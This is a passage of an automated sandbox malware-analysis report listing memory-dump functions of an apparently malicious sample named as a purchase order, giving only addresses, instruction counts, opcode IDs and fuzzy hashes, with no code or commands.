                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c555bd51f55f03f9705692080fa8e176370523079496118716fdaa53bfdaa6b
                                        • Instruction ID: 91159b3c1c9d5dbfefdf36df68724c334acef8e56c4e37346313bc96af600e67
                                        • Opcode Fuzzy Hash: 4c555bd51f55f03f9705692080fa8e176370523079496118716fdaa53bfdaa6b
                                        • Instruction Fuzzy Hash: 0F517071E002499FCB14DFAAD945AEFBFFAEF89310F10841AE915E3250DB749945CBA0
                                        Function 050FA7D8 Relevance: .2, Instructions: 153COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b39b5632608ed399800f2c0e96de5d149d976bab10a51ad366e63ab14fd6a5d6
                                        • Instruction ID: 83cc71c34aaefe4bfcb5182c266e1c7085b71afa501f75302c2cdc6cc1eb4372
                                        • Opcode Fuzzy Hash: b39b5632608ed399800f2c0e96de5d149d976bab10a51ad366e63ab14fd6a5d6
                                        • Instruction Fuzzy Hash: D65134307092009FCB29DB64E814BAEBBEAFF85300F1584BAD54A87791CB789906CB51
                                        Function 050FB8B0 Relevance: .2, Instructions: 153COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c0778ee89ca80ee8c0d2ab9c6b91039a4b66a6738c7c66751fc9300ffa74e753
                                        • Instruction ID: 03e61eee7469a110321711e99fd0996023f5c744492e3eaa268912b4c8e97cee
                                        • Opcode Fuzzy Hash: c0778ee89ca80ee8c0d2ab9c6b91039a4b66a6738c7c66751fc9300ffa74e753
                                        • Instruction Fuzzy Hash: C451A130B042099FCB48EFB8C8502AE7BB6BF89310F148569D545AB385DE39DD42DB91
                                        Function 050F483C Relevance: .1, Instructions: 134COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b51a192f1b580fbfbb69cd5a3e248f88c078cd5592120b07c50d1beda07732f6
                                        • Instruction ID: 79f2929936ad6ff4e7faa00a011b323649dcb78454aae78904a39fd2835009c8
                                        • Opcode Fuzzy Hash: b51a192f1b580fbfbb69cd5a3e248f88c078cd5592120b07c50d1beda07732f6
                                        • Instruction Fuzzy Hash: C231B270E12218DFCB14DFA4F5585EDBFB2FF85300F1085A9E54167665CB329855CB40
                                        Function 050F4878 Relevance: .1, Instructions: 124COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5a4e3324fb1ab075cfae4d051af4b63314b69116ca94fee77284ecc60b7c3f99
                                        • Instruction ID: 1c67504a5acfd4a6f8e66b210f136f6c5d6fccf60b39f5306248719abc919166
                                        • Opcode Fuzzy Hash: 5a4e3324fb1ab075cfae4d051af4b63314b69116ca94fee77284ecc60b7c3f99
                                        • Instruction Fuzzy Hash: DB41B130E00205CFCF15FBB4E0546EEBBB2EF88610F144869CA06A7795DF748986CBA5
                                        Function 050F2D22 Relevance: .1, Instructions: 123COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bbb02a95870d21b77af050af94c436d12c3221d8ac4b260bc73847bcfb60228f
                                        • Instruction ID: 8f31d70ab075237663b52335fc99ba325f605e96ca76cbb401d290bfa4f84796
                                        • Opcode Fuzzy Hash: bbb02a95870d21b77af050af94c436d12c3221d8ac4b260bc73847bcfb60228f
                                        • Instruction Fuzzy Hash: A551C338601605EFCB54DF68E884DAEBBB6FF49720B114499F901AB361DB31EC81CB50
                                        Function 050F8360 Relevance: .1, Instructions: 118COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b34229eb197594a3cde482202428964801c4e7742db752b61de984bbb9733b0a
                                        • Instruction ID: a7a8acf8ae2a7e426184d598e6fcde731051c46c77ede3e70acc00b8a1929ad7
                                        • Opcode Fuzzy Hash: b34229eb197594a3cde482202428964801c4e7742db752b61de984bbb9733b0a
                                        • Instruction Fuzzy Hash: 6541E634A042198FCB54DBA8D894BDDB7F5BF88704F114068EA05AB7A5DB39E805CBA0
                                        Function 050FB2C0 Relevance: .1, Instructions: 107COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b174153262c6dd15fc4579e0cc3557336b01fb43e947151f91ca6ccadf47a39e
                                        • Instruction ID: 293e42c91d5b9b17519063a5f1551cc9a143d842b7af757b09161a5ecb7e44a4
                                        • Opcode Fuzzy Hash: b174153262c6dd15fc4579e0cc3557336b01fb43e947151f91ca6ccadf47a39e
                                        • Instruction Fuzzy Hash: F5410C30D0464A8ECB41EFA8C884AAEB7B1FF45300F05866AD559BB521EB30E9C5CB50
                                        Function 050F8228 Relevance: .1, Instructions: 102COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12df900bfb52e92a4b8cf60b9defec7d405dbe10cea0a7bb5853344531a08228
                                        • Instruction ID: 52a44455262fbee985e569d97bd61971eb99f1af7d82169acaeefab5b9b1f53b
                                        • Opcode Fuzzy Hash: 12df900bfb52e92a4b8cf60b9defec7d405dbe10cea0a7bb5853344531a08228
                                        • Instruction Fuzzy Hash: FA31C130B042048FCB58EB79D8546AF7BABEFC5710B1484A9D105DB3A5DF38AC06C7A1
                                        Function 050F4728 Relevance: .1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42f083c715e83afc362eed94b2b7933670ffe4009808202f315dcbc1e38cdd1f
                                        • Instruction ID: 15134465367e2beab73033578c292f489b0497db442dc470d4b23423fcc0b4a6
                                        • Opcode Fuzzy Hash: 42f083c715e83afc362eed94b2b7933670ffe4009808202f315dcbc1e38cdd1f
                                        • Instruction Fuzzy Hash: 8041BDB0D103599FDB14CF9AD988ADEFBB1BF48710F20822AE418BB250D7756845CF91
                                        Function 050F4868 Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 578bbf234994c43c7ad6993bbda87dad9f974138551b13877bb6de7ba1280731
                                        • Instruction ID: d1ad23d6550d181ad107e31fb503c2a4ab23affb352bf7f9ffd36776fff3cd1d
                                        • Opcode Fuzzy Hash: 578bbf234994c43c7ad6993bbda87dad9f974138551b13877bb6de7ba1280731
                                        • Instruction Fuzzy Hash: 7931D370E002058FDF28EB74E4547AF7AB2EF89210F104979CA06A7395DF788A45CB96
                                        Function 050F5910 Relevance: .1, Instructions: 88COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70d1fc5e6bbf2101b74d88aa735a524486227c61b5a488ae0eca19f9b717c671
                                        • Instruction ID: fa50f7481d1b526d22b18f8764e6dac4dcfc64d19cd741d224842ff1bad6f8da
                                        • Opcode Fuzzy Hash: 70d1fc5e6bbf2101b74d88aa735a524486227c61b5a488ae0eca19f9b717c671
                                        • Instruction Fuzzy Hash: F6218271B002455FCF54DBAADD049FFBFFAAFC5200F14851AE555D3654EA709A01CBA0
                                        Function 050FD8E0 Relevance: .1, Instructions: 86COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e3def0c1f329ec7e34cd13bc55a19eea94d234fa2589f6bd9005d366198e1c85
                                        • Instruction ID: 1597ced7dd896a8b906d76d4f57e3826a8fb7647f574fb2b9ccd456d16893f9d
                                        • Opcode Fuzzy Hash: e3def0c1f329ec7e34cd13bc55a19eea94d234fa2589f6bd9005d366198e1c85
                                        • Instruction Fuzzy Hash: 892190367142018FCB58EBADF45496E73EAEFC962471540AADA06CB771EE31DC01CB90
                                        Function 050FC1D1 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 51410bce8a41fa4990bb419434438690d452260119dc078c1d0b3c82bd152b37
                                        • Instruction ID: 0cc8eebb5ab4a1693062ed1b1cd7f3c339a1c9de7a1f682b227f5b7716f814e2
                                        • Opcode Fuzzy Hash: 51410bce8a41fa4990bb419434438690d452260119dc078c1d0b3c82bd152b37
                                        • Instruction Fuzzy Hash: B8310931C04B4A8ECB41EFA8C8446A9F7B0FF45300F45C6AAD4997B521EB30A9C5CB91
                                        Function 050F5F50 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf50931afacf7fcfb814dff4db141d10d14c35b6c73deba010f521fe5e48eacc
                                        • Instruction ID: 8780028293d953f2a5133fdd3903bc9968bc140907766da7802e803357a7dd5d
                                        • Opcode Fuzzy Hash: bf50931afacf7fcfb814dff4db141d10d14c35b6c73deba010f521fe5e48eacc
                                        • Instruction Fuzzy Hash: A8318C35A05249EFCB05CF99E844EDEBFF2BF49300F1480AAE505AB261DB32D945CB50
                                        Function 050F0098 Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 35dd89138905529b7f95dc02b83b15608077b7111c0391af3294f9adfb5f03a8
                                        • Instruction ID: 8ff1cf4dde082d6031cbf883b720d164688702f0a62fcc7938fd96cb166d75a2
                                        • Opcode Fuzzy Hash: 35dd89138905529b7f95dc02b83b15608077b7111c0391af3294f9adfb5f03a8
                                        • Instruction Fuzzy Hash: 5F310132910B099ECB01AFB8D8544D9FBB5FF95300B119B5AE95927121FB30E695CB80
                                        Function 050F4D26 Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: adfc370fdd60a95588b472be440b891aadb412fa3a0c21f01bebf0ebfdeb97fa
                                        • Instruction ID: 6429fb5f76ecc686039b8423847237f884e67b1acf8c67b2c1a8cefbdb9f8586
                                        • Opcode Fuzzy Hash: adfc370fdd60a95588b472be440b891aadb412fa3a0c21f01bebf0ebfdeb97fa
                                        • Instruction Fuzzy Hash: EC31D635A1020AEFDB05AFB0D8589DEBFB6FF8A304F148559F4026B265DF349806DB91
                                        Function 050F8639 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d794eb81fc351d5db1474ae098359ed44bd5e1c6967c58b9459dc0b561aeca4c
                                        • Instruction ID: dbb764844387c541e55f128ea9e152af7171fcb1c168a1c0773db0380757ffd1
                                        • Opcode Fuzzy Hash: d794eb81fc351d5db1474ae098359ed44bd5e1c6967c58b9459dc0b561aeca4c
                                        • Instruction Fuzzy Hash: E62138343102008FCB98AB39E954A6A77EAEF85715B14847DE606CB7B5DB76EC02CB50
                                        Function 00F0D3D8 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2013847408.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_f0d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7118f236327e2817dfa43d1353f87808e4ca53527251828df878271b9bf854e0
                                        • Instruction ID: 5228f3b337373f65ef0a785650add1512d5760fb59746ad131ad89dd0548fc0f
                                        • Opcode Fuzzy Hash: 7118f236327e2817dfa43d1353f87808e4ca53527251828df878271b9bf854e0
                                        • Instruction Fuzzy Hash: DA213A76500204DFDB05DF54D9C0F26BF65FB98324F20C569E9090B296C33AE856F7A2
                                        Function 00F0D4C4 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2013847408.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_f0d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 20c5395b4ad3574dd51de75fe02a5c0603c0701a7aeb2ca9aded15574009a310
                                        • Instruction ID: 608f8d6b1fa442d32271055f82412fd0c0025faee3e8aba32d95905b48c718bb
                                        • Opcode Fuzzy Hash: 20c5395b4ad3574dd51de75fe02a5c0603c0701a7aeb2ca9aded15574009a310
                                        • Instruction Fuzzy Hash: DC210676500244DFCB15DF54D9C0F26BF65FB98328F24C569ED090B296C336D816F6A2
                                        Function 050F5614 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e335ac2709e86d038040ab26719a4041f94e9fb1d625c306ada855c94e3080c7
                                        • Instruction ID: a2bc8ddcc351d56020a54f077de8a53ff6eed340fdb2940c1df9992fa055c4f3
                                        • Opcode Fuzzy Hash: e335ac2709e86d038040ab26719a4041f94e9fb1d625c306ada855c94e3080c7
                                        • Instruction Fuzzy Hash: 1521D475E1030A9FDF04EFB9D9905FEBBF6AF89240F58452AD505E3251EB3489028B62
                                        Function 050F4D30 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 268a06658f2864c5d4f98f0f6501748c51d879f637fbd3a5f91e46726bec71de
                                        • Instruction ID: 983853f57455e1e7c1c9314844b358e27c4d32bc601a54e89dfc1405efc15547
                                        • Opcode Fuzzy Hash: 268a06658f2864c5d4f98f0f6501748c51d879f637fbd3a5f91e46726bec71de
                                        • Instruction Fuzzy Hash: 4821E735A1020AEFCB05AFB0D85499EBFB6FF8A304F044519F0026B265DF349806DB91
                                        Function 050F00A8 Relevance: .1, Instructions: 74COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba36e8d7da93bd6170c0e32d69eb7e5a7185650bf7f60e52d35d6ae60de7826c
                                        • Instruction ID: 68da481ffe0717c8ffa338cd0ccc6cf01917912a0ae9647332e4c6f05c343434
                                        • Opcode Fuzzy Hash: ba36e8d7da93bd6170c0e32d69eb7e5a7185650bf7f60e52d35d6ae60de7826c
                                        • Instruction Fuzzy Hash: 3031D132910B09DACB01EF68D854899F7B5FF95300B118B5AE95967121FB30E695CB81
                                        Function 00F1D1D4 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2013939455.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_f1d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff468cb0018dc27e0170670768106808fa803d1a78979e01fa2a02ee91c21f19
                                        • Instruction ID: 7eeb6d31f9fd8a9c39d8f24716231633c6f60f95283ebc8d8eb8337d4c955be0
                                        • Opcode Fuzzy Hash: ff468cb0018dc27e0170670768106808fa803d1a78979e01fa2a02ee91c21f19
                                        • Instruction Fuzzy Hash: 9B210771904284EFDB05DF14D9C0F66BBB5FB84324F20C66DD9194B256C33AD886EA61
                                        Function 00F1D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2013939455.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_f1d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3333b88b7d01b71f3201ea529ada39addca38dcf5fb3195c103d2f0b1f9080d2
                                        • Instruction ID: feb32291ee2d44619a9f08c942d6af5ef6fce61e33b481eae3276dd02292bedf
                                        • Opcode Fuzzy Hash: 3333b88b7d01b71f3201ea529ada39addca38dcf5fb3195c103d2f0b1f9080d2
                                        • Instruction Fuzzy Hash: 3821F575504204DFCB14DF24D984B56BF75FB88324F20C56DD90A4B25AC33AD887EA62
                                        Function 050F357F Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 94d0e5bd044fa7e0dd0ccc76597b7ce5b4d330a4821aa675bef949850b182e3b
                                        • Instruction ID: 6a5dabd6a32ee3e5fc87e6e73b3f5d7e2a28e137f4b47224f75689f50a982852
                                        • Opcode Fuzzy Hash: 94d0e5bd044fa7e0dd0ccc76597b7ce5b4d330a4821aa675bef949850b182e3b
                                        • Instruction Fuzzy Hash: FD211D72E0020A9FCF04DFA9D8849EEFBF9FF99310B10855AE514E7211E7709556CB90
                                        Function 050F2C70 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d33f891bd7e60f0bdcec9d9a81acadfa7aca41bfe297f774d6e3db435e7474b3
                                        • Instruction ID: 521bad7da68e579899cde6b1972c1f62eac1902a9e831b8f58edb111c2bf76fc
                                        • Opcode Fuzzy Hash: d33f891bd7e60f0bdcec9d9a81acadfa7aca41bfe297f774d6e3db435e7474b3
                                        • Instruction Fuzzy Hash: 252151397006159FC764DE15E9C0E6E77FAFF88625B11442EEA0687B51C771E841CBA0
                                        Function 050F2C60 Relevance: .1, Instructions: 66COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e51459beca92b73f981be3d9bccd8001e09fcc0ff03ffb206f9ef71792d45ec1
                                        • Instruction ID: 2d47672c612a057a6c4d5065b0a68cfbe9bc665140a9d5e49491ea4891a0a0d4
                                        • Opcode Fuzzy Hash: e51459beca92b73f981be3d9bccd8001e09fcc0ff03ffb206f9ef71792d45ec1
                                        • Instruction Fuzzy Hash: F5218C797006119FCB64DE15E980E6AB7FAFF88724F11442DEA0687B51D731E881CBA0
                                        Function 00F1D005 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2013939455.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_f1d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff5d9035e9cc14b78662d6e56b3dd366acd738037a4f46bbaf4a79ff2f0d2118
                                        • Instruction ID: 746d2bfba5cba891debc4e65acdb19724e72f638710ca367ab5be079570c360c
                                        • Opcode Fuzzy Hash: ff5d9035e9cc14b78662d6e56b3dd366acd738037a4f46bbaf4a79ff2f0d2118
                                        • Instruction Fuzzy Hash: 8D2192755093C08FCB02CF24D994715BF71EB4A314F28C5EAD8498F2A7C33A984ADB62
                                        Function 050F0C88 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d92a987d6492aecf1cbb657eb65bdf21ddc4a18a528333ea69a133a04a84dd81
                                        • Instruction ID: 447163f0012af8e4abab324e46484a4cde4a41f03b5597e606ab9da5dfa39544
                                        • Opcode Fuzzy Hash: d92a987d6492aecf1cbb657eb65bdf21ddc4a18a528333ea69a133a04a84dd81
                                        • Instruction Fuzzy Hash: 9511E7343046008FD718D665E8A5B6FB7D6FFC5324F54C429E6878B699CB74E802C740
                                        Function 050F7ED8 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 978da1dc284fd2be941f65e1535b9f61ca3a3113e99b8d57989eb92d41e6e633
                                        • Instruction ID: 1ed979590bee79ddf9088b88afed59c9c1bd2465a31e8c7a1954a63aaf16c3ee
                                        • Opcode Fuzzy Hash: 978da1dc284fd2be941f65e1535b9f61ca3a3113e99b8d57989eb92d41e6e633
                                        • Instruction Fuzzy Hash: 0401E5317041285BC758AB7998113AF7E9EEF85750F148079E509D7784DE388D0283D2
                                        Function 050F3590 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 409f7ba496b09207303b69ddaaf10aa5ca0126040225e033b6517ec6fe8bc7c6
                                        • Instruction ID: 978712604f5e5a4291276fe96ea41d175b2cf4cf1eaa191d34cbe36d5fe001dc
                                        • Opcode Fuzzy Hash: 409f7ba496b09207303b69ddaaf10aa5ca0126040225e033b6517ec6fe8bc7c6
                                        • Instruction Fuzzy Hash: 6821CC71E0020A9F8B04DFADC8849EFFBF9FF99310B10855AE518E7215E770A956CB90
                                        Function 050F0C98 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a9bdadfaf54d5c879d0e43cdcd5e9da7b0e4138bc87a92770bd16609f1237358
                                        • Instruction ID: dc8c81c1ff18e85d579ed4a0cac9e73913a2a3b2757380638dfac2b549d01b50
                                        • Opcode Fuzzy Hash: a9bdadfaf54d5c879d0e43cdcd5e9da7b0e4138bc87a92770bd16609f1237358
                                        • Instruction Fuzzy Hash: 1511C6343056008FD728D625E8A4B6E73DAFFC4324F54C839E64B87695CB75E802C781
